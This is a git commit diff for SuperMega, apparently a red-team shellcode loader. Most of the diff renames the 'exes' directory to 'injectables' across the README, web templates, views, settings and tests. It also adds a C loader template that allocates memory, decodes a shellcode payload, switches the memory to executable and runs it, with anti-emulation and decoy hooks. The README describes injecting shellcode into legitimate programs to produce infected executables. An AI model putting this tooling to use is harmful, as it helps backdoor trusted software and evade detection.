refactor: rename exes/ to injectables/

.gitignore

@@ -5,12 +5,6 @@ tools/
 doc/
 
 projects/*
-!projects/default/
-!projects/default/**
-
-data/binary/exes_more/
-data/source/payload/
-data/binary/exes/*
 
 log-*
 *.verify.exe

README.md

@@ -100,7 +100,7 @@ C:\Users\dobin\Repos\SuperMega>python.exe supermega.py
 (helper.py       )    > Run process: ml64.exe projects/commandline/main.asm /link /OUT:projects/commandline/main.exe /entry:AlignRSP
 (assembler.py    )     Carrier Size: 590
 (injector.py     ) -[ Injecting Carrier
-(injector.py     )     Injectable: data/binary/exes/procexp64.exe -> projects/commandline/procexp64.infected.exe
+(injector.py     )     Injectable: data/binary/injectables/procexp64.exe -> projects/commandline/procexp64.infected.exe
 (injector.py     )     Checking if IAT entries required by carrier are available
 (injector.py     )     IAT entries missing: 0
 (injector.py     )     Inject: Write Carrier to 0x71C8D (0x7108D)
@@ -112,7 +112,7 @@ C:\Users\dobin\Repos\SuperMega>python.exe supermega.py
 
 To inject shellcode `messagebox.bin` into injectable `procexp64.exe` with carrier `alloc_rw_rx` and decoder `xor_1`, where: 
 * shellcode `messagebox.bin`: `data/binary/shellcodes/messagebox.bin`
-* injectable `procexp64.exe`: `data/binary/exes/procexp64.exe`
+* injectable `procexp64.exe`: `data/binary/injectables/procexp64.exe`
 * carrier `alloc_rw_rx`: `data/source/carrier/alloc_rw_rx/template.c`
 * decoder `xor_1`: `data/source/decoder/xor_1.c`
 
@@ -138,7 +138,7 @@ To inject shellcode `messagebox.bin` into injectable `procexp64.exe` with carrie
 (helper.py       )    > Run process: ml64.exe projects/commandline/main.asm /link /OUT:projects/commandline/main.exe /entry:AlignRSP
 (assembler.py    )     Carrier Size: 576
 (injector.py     ) -[ Injecting Carrier
-(injector.py     )     Injectable: data/binary/exes/procexp64.exe -> projects/commandline/procexp64.infected.exe
+(injector.py     )     Injectable: data/binary/injectables/procexp64.exe -> projects/commandline/procexp64.infected.exe
 (injector.py     )     Checking if IAT entries required by carrier are available
 (injector.py     )     IAT entries missing: 0
 (injector.py     )     Inject: Write Carrier to 0x71C43 (0x71043)
@@ -175,7 +175,7 @@ community edition.
 
 Input: 
 * `data/binary/shellcodes`: Input: Shellcodes we want to use as input (payload). .bin
-* `data/binary/exes/`: Input: Nonmalicious EXE files we inject into. .exe
+* `data/binary/injectables/`: Input: Nonmalicious EXE files we inject into. .exe
 
 Output:
 * `projects/<projectname>`: output: Project directory with generated files, including infected exe

app/templates/index.html

@@ -24,7 +24,7 @@
     The original functionality of the EXE/DLL will not work anymore (it will only execute the carrier
     with the shellcode it is carrying)
     <br>
-    Located in the <code>data/binary/exes/</code> directory. <br>
+    Located in the <code>data/binary/injectables/</code> directory. <br>
     
 
     <h3>Carrier</h3>

app/templates/injectables.html

@@ -8,18 +8,18 @@
 
     <div class="indent">
 
-    Injectables in <code>data/binary/exes</code>
+    Injectables in <code>data/binary/injectables</code>
 
-    {% for exe in exes %}
+    {% for injectable in injectables %}
-        <h3>{{exe['name']}}</h3>
+        <h3>{{injectable['name']}}</h3>
-        <a href="/exes/{{exe['name']}}">More details</a>
+        <a href="/injectables/{{injectable['name']}}">More details</a>
 
         <table class="table">
             <tr>
                 <th>name</th>
                 <th>raw size</th>
             </tr>
-            {% for section in exe['sections'] %}
+            {% for section in injectable['sections'] %}
             <tr>
                 <td>{{section['name']}}</td>
                 <td>{{section['raw_size']}}</td>

app/templates/navigation.html

@@ -23,8 +23,8 @@
                        href="/projects">Projects</a>
                 </li>
                 <li class="nav-item">
-                    <a class="nav-link {{ 'active' if request.path == '/exes' else '' }}" 
+                    <a class="nav-link {{ 'active' if request.path == '/injectables' else '' }}" 
-                       href="/exes">Injectables</a>
+                       href="/injectables">Injectables</a>
                 </li>
             </ul>
         </div>

app/templates/project.html

@@ -78,18 +78,18 @@
                 <div class="form-group row">
                     <label for="exe" class="col-sm-3 col-form-label"
                            data-bs-toggle="tooltip" data-bs-placement="top" 
-                           title="EXE or DLL to infect, from data/binary/exes/"   
+                           title="EXE or DLL to infect, from data/binary/injectables/"   
                     >
                         Injectable
                     </label>
                     <div class="col-sm-9">
                         <select class="form-select" id="exe" name="exe" 
                                 aria-label="EXE" onchange="this.form.submit()">
-                            {% for exe in exes %}
+                            {% for injectable in injectables %}
-                            <option value="{{exe['filename']}}"
+                            <option value="{{injectable['filename']}}"
-                                {% if exe['filename'] == settings.injectable_base %} selected {% endif %}
+                                {% if injectable['filename'] == settings.injectable_base %} selected {% endif %}
                             >
-                            {{exe['filename'] | basename}} ({{exe['size']}})</option>
+                            {{injectable['filename'] | basename}} ({{injectable['size']}})</option>
                             {% endfor %}
                         </select>
                     </div>
@@ -110,7 +110,7 @@
 
             <!-- Row 3: exe and shellcode info -->
             <div class="col-2">
-                <a href="/exes/{{settings.get_inject_exe_in() | basename}}">EXE Info:</a>
+                <a href="/injectables/{{settings.get_inject_exe_in() | basename}}">EXE Info:</a>
                 <ul>
                     <li>
                         {% if is_64 %}

app/views.py

@@ -17,15 +17,15 @@ def index():
     return render_template('index.html')
 
 
-@views.route("/exes/<exe_name>")
+@views.route("/injectables/<exe_name>")
-def exe_view(exe_name):
+def injectable_view(exe_name):
-    filepath = "{}{}".format(PATH_EXES, exe_name)
+    filepath = "{}{}".format(PATH_INJECTABLES, exe_name)
     if not os.path.exists(filepath):
        return "File not found: {}".format(exe_name)
 
     superpe = SuperPe(filepath)
 
-    return render_template('exe.html', 
+    return render_template('injectable.html', 
                            superpe=superpe, 
                            resolved_dlls=resolve_dlls(superpe),
                            iat=superpe.get_iat_entries(),
@@ -33,16 +33,16 @@ def exe_view(exe_name):
     )
 
 
-@views.route("/exes")
+@views.route("/injectables")
-def exes_view():
+def injectables_view():
-    exes = []
+    injectables = []
-    for file in os.listdir(PATH_EXES):
+    for file in os.listdir(PATH_INJECTABLES):
         if not file.endswith(".dll") and not file.endswith(".exe"):
             continue
         if '.verify' in file or '.test' in file:
             continue
 
-        superpe = SuperPe("{}/{}".format(PATH_EXES, file))
+        superpe = SuperPe("{}/{}".format(PATH_INJECTABLES, file))
 
         e = {
             'name': file,
@@ -50,9 +50,9 @@ def exes_view():
             #'iat': superpe.get_iat_entries(),
             'sections': superpe.pe_sections,
         }
-        exes.append(e)
+        injectables.append(e)
         #break
-    return render_template('exes.html', exes=exes)
+    return render_template('injectables.html', injectables=injectables)
 
 
 @views.app_template_filter('hexint')

app/views_project.py

@@ -47,8 +47,7 @@ def project(name):
     if project_setting == None:
         logger.error("Project {} not found".format(name))
         return redirect("/projects", code=302)
-    
+    #project_setting.print()
-    project_setting.print()
     
     is_built = False
     if os.path.exists(project_setting.get_inject_exe_out()):
@@ -97,7 +96,7 @@ def project(name):
 
     project_dir = os.path.dirname(os.getcwd() + "\\" + project_setting.project_path)
     log_files = get_logfiles(project_setting.project_path)
-    exes = list_files_and_sizes(PATH_EXES)
+    injectables = list_files_and_sizes(PATH_INJECTABLES)
     shellcodes = list_files_and_sizes(PATH_SHELLCODES)
 
     carrier_names = get_template_names()
@@ -117,7 +116,7 @@ def project(name):
         project_dir=project_dir,
         settings=project_setting,
         
-        exes=exes,
+        injectables=injectables,
         shellcodes=shellcodes,
         carrier_names=carrier_names,
         decoder_styles=decoder_styles,

model/defs.py

@@ -7,10 +7,11 @@ class FilePath(str):
 # with data/shellcodes/createfile.bin
 VerifyFilename: FilePath = FilePath("C:\\Temp\\a")
 
-# Directory structure
+# Input Binary
-PATH_EXES = "data/binary/exes/"
+PATH_INJECTABLES = "data/binary/injectables/"
-
 PATH_SHELLCODES = "data/binary/shellcodes/"
+
+# Input Source
 PATH_CARRIER = "data/source/carrier/"
 PATH_DECODER = "data/source/decoder/"
 PATH_ANTIEMULATION = "data/source/antiemulation/"
@@ -18,7 +19,7 @@ PATH_DECOY = "data/source/decoy/"
 PATH_GUARDRAILS = "data/source/guardrails/"
 PATH_VIRTUALPROTECT = "data/source/virtualprotect/"
 
-PATH_PAYLOAD = "data/source/payload/"
+# Project settings
 PATH_WEB_PROJECT = "projects/"
 
 

model/settings.py

@@ -16,7 +16,7 @@ class Settings():
         self.project_exe_path: FilePath = FilePath(self.project_path + "main.exe")
         self.project_shc_path: FilePath = FilePath(self.project_path + "main.bin")
         
-        # IN: Injectable (like "7z.exe", in data/input/exes/)
+        # IN: Injectable (like "7z.exe", in data/input/injectables/)
         self.injectable_base: str = ""
         # IN: Payload / Shellcode (like "createfile.bin", in data/input/shellcodes/)
         self.payload_base: str = ""
@@ -62,7 +62,7 @@ class Settings():
     def get_inject_exe_in(self) -> FilePath:
         if self.injectable_base == "":
             return None
-        return FilePath(PATH_EXES + self.injectable_base)
+        return FilePath(PATH_INJECTABLES + self.injectable_base)
     
     def get_inject_exe_out(self) -> FilePath:
         return FilePath("{}{}".format(

projects/default/template.c

@@ -0,0 +1,62 @@
+#include <Windows.h>
+
+#include <time.h>
+
+char *supermega_payload;
+
+#define p_RW  0x04
+#define p_RX  0x20
+#define p_RWX 0x40
+
+
+{{plugin_antiemulation}}
+
+{{plugin_decoy}}
+
+{{plugin_executionguardrail}}
+
+{{plugin_virtualprotect}}
+
+/* VirtualAlloc -> rw -> rx
+
+   * create new memory region for the payload
+   * will set it to RX (may break some shellcodes, opsec-safe)
+*/
+
+int main()
+{
+	DWORD result;
+
+	// Call: Execution Guardrail
+	if (executionguardrail() != 0) {
+		return 1;
+	}
+
+	// Call: Anti Emulation plugin
+	antiemulation();
+
+	// Call: Decoy plugin
+	decoy();
+
+	// Allocate 1
+    // char *dest = ...
+    char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, p_RW);
+
+	// Wait a bit
+    //Sleep(2000);
+
+	// Copy (and decode)
+	// from: supermega_payload[]
+	// to:   dest[]
+{{ plugin_decoder }}
+
+	if (MyVirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
+		return 7;
+	}
+
+    // Execute *dest
+    (*(void(*)())(dest))();
+
+	return 0;
+}
+

supermega.py

@@ -30,7 +30,7 @@ def main():
 
     parser = argparse.ArgumentParser(description='SuperMega shellcode loader')
     parser.add_argument('--shellcode', type=str, help='payload shellcode: data/binary/shellcodes/* (messagebox.bin, calc64.bin, ...)', default="calc64.bin")
-    parser.add_argument('--inject', type=str, help='which exe to inject into: data/binary/exes/* (7z.exe, procexp64.exe, ...)', default="procexp64.exe")
+    parser.add_argument('--inject', type=str, help='which exe to inject into: data/binary/injectables/* (7z.exe, procexp64.exe, ...)', default="procexp64.exe")
     parser.add_argument('--carrier', type=str, help='carrier: data/source/carrier/* (alloc_rw_rx, peb_walk, ...)', default="alloc_rw_rx")
     parser.add_argument('--decoder', type=str, help='decoder: data/source/decoders/* (xor_1, xor_2, plain, ...)', default="xor_2")
     parser.add_argument('--antiemulation', type=str, help='anti-emulation: data/source/antiemulation/* (sirallocalot, timeraw, none, ...)', default="sirallocalot")

tests/test_datareuse.py

@@ -36,7 +36,7 @@ class DataReuseTest(unittest.TestCase):
         self.assertIsNotNone(hole)
 
     def test_relocation_list(self):
-        superpe = SuperPe(PATH_EXES + "7z.exe")
+        superpe = SuperPe(PATH_INJECTABLES + "7z.exe")
         relocs = superpe.get_relocations_for_section(".rdata")
         self.assertEqual(836, len(relocs))
         reloc = relocs[0]
@@ -48,7 +48,7 @@ class DataReuseTest(unittest.TestCase):
 
     def test_relocmanager(self):
         """Test reference EXE reloc manager information"""
-        superpe = SuperPe(PATH_EXES + "procexp64.exe")
+        superpe = SuperPe(PATH_INJECTABLES + "procexp64.exe")
         rm = superpe.get_rdata_rangemanager()
         self.assertEqual(61, len(rm.intervals))
         # 0x1ab0 is magic currently (should use find_first_utf16_string_offset()
@@ -57,7 +57,7 @@ class DataReuseTest(unittest.TestCase):
 
 
     def test_largestgap(self):
-        superpe = SuperPe(PATH_EXES + "7z.exe")
+        superpe = SuperPe(PATH_INJECTABLES + "7z.exe")
         rm = superpe.get_rdata_rangemanager()
         start, stop = rm.find_hole(100)
         self.assertEqual(394513, start)

tests/test_derbackdoorer.py

@@ -16,7 +16,7 @@ class DerBackdoorerTest(unittest.TestCase):
 
 
     def test_function_backdoorer_exe(self):
-        superpe = SuperPe(PATH_EXES + "iattest-full.exe")
+        superpe = SuperPe(PATH_INJECTABLES + "iattest-full.exe")
         function_backdoorer = FunctionBackdoorer(superpe, depth_option=DEPTH_OPTIONS.LEVEL1)
 
         addr = function_backdoorer.find_suitable_instruction_addr(superpe.get_entrypoint())
@@ -24,7 +24,7 @@ class DerBackdoorerTest(unittest.TestCase):
 
 
     def test_function_backdoorer_dll(self):
-        superpe = SuperPe(PATH_EXES + "TestDLL.dll")
+        superpe = SuperPe(PATH_INJECTABLES + "TestDLL.dll")
         function_backdoorer = FunctionBackdoorer(superpe)
 
         addr = function_backdoorer.find_suitable_instruction_addr(superpe.get_entrypoint())

tests/test_dllresolver.py

@@ -10,7 +10,7 @@ from pe.dllresolver import *
 class DllResolverTest(unittest.TestCase):
     
     def test_dllresolver(self):
-        filename = "data/binary/exes/7z.exe"
+        filename = "data/binary/injectables/7z.exe"
         superpe = SuperPe(filename)
 
         self.assertTrue(all_dll_exist(superpe))

tests/test_superpe.py

@@ -9,7 +9,7 @@ from pe.superpe import SuperPe, PeSection
 class SuperPeTest(unittest.TestCase):
 
     def test_exe(self):
-        dll_filepath = PATH_EXES + "procexp64.exe"
+        dll_filepath = PATH_INJECTABLES + "procexp64.exe"
         superpe = SuperPe(dll_filepath)
 
         # Properties
@@ -70,7 +70,7 @@ class SuperPeTest(unittest.TestCase):
 
 
     def test_dll(self):
-        dll_filepath = PATH_EXES + "TestDLL.dll"
+        dll_filepath = PATH_INJECTABLES + "TestDLL.dll"
         superpe = SuperPe(dll_filepath)
 
         # Properties